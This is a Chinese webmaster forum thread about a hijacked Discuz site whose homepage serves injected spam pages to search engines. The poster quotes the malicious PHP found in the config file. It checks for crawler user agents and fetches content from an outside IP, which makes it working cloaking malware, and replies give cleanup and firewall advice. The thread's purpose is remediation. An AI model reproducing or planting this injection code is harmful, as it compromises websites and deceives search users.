网站被劫持后发现网站首页后面加任意字符都可以访问如何解决？

网站被劫持后发现网站首页后面加任意字符都可以访问如何解决？

) }+ t7 D& P3 q. N/ B1 B, V网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
- F  A, t( @: ^- D9 @, z百度收录大量的这样帖子

现在如何解决这样的？
& @2 X, P& Y, k- G
7 g7 n, A8 w7 l8 k# \" ^8 s宝塔面板。。。。。。
5 @' @$ ?5 \/ s, i6 `
如/forum.php?123456
( k9 c3 ~8 e- l; t) u- M2 n# A/forum.php?12365
! n+ Q5 K' [6 k4 T) W/forum.php?515151
$ }( X& J/ g6 G" J2 u) }/ O# O  B0 m7 q/ ^
" @4 K8 @* t; s8 l+ f* |4 [随便加都可以访问，只有首页而已其他文章帖子加就不可以。。。

0 Y2 h( v% N& O7 s$ n9 E#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
// --------------------------  CONFIG ADMINCP  -------------------------- //
4 O- y0 h; r% A6 A$ M// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //

你找到了劫持代码 并没有找到后门在哪，还是会出现的

cardz! 发表于 2020-11-30 06:34
这个是加什么都可以访问，出现这种字符的原因解决了就好了。Q3160510998

啥原因呀？现在是加啥都还可以访问..

cardz! 发表于 2020-11-30 13:54
) j' E6 k% h& q谁的都可以，不只是你的。

, J: ?0 N# |0 z  q. z& [那不是不能解决了？已经收录了好多了

1270643127 发表于 2020-11-30 17:40
8 B" a& m$ D' ^# m+ i/ Z* I" Y8 W那不是不能解决了？已经收录了好多了

1 r; T7 o% T, Y  o你先把config里边那段代码删除，然后还要检查最近新增和修改的文件

你去做一个抓取测试(你自己正常访问页面，是正常的，但是蜘蛛访问，是另外一个样子)
如果没有注册百度站长或者百度统计，就去下面这个网址，也可以

1. http://stool.chinaz.com/tools/webcheck.aspx

复制代码

' W- Q* J' x: T0 _6 t9 F/ y4 P如果以前的那些页面依然有问题，就说明你没有清除干净（也算不上清除干净，你删除了恶意代码，但是后门还是在的）

我自己网站的黑链网址是/?s***.后缀   清除之后，这些页面就不能访问了，然后你可以去百度提交死链，删除这些快照。当然啦，我很早以前就在robots里边直接屏蔽了【？】 所以被挂黑链半个月，百度 根本没有收录黑链。然后我发现黑链之后，直接去百度申请闭站了，解决完了才恢复的

而且你使用宝塔，宝塔有免费防火墙，你可以把恶意代码的一些关键词，比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且，定期扫描(扫描结果要分析哈，DZ默认的某些文件也会被扫描出有问题，但是并不是真的有问题)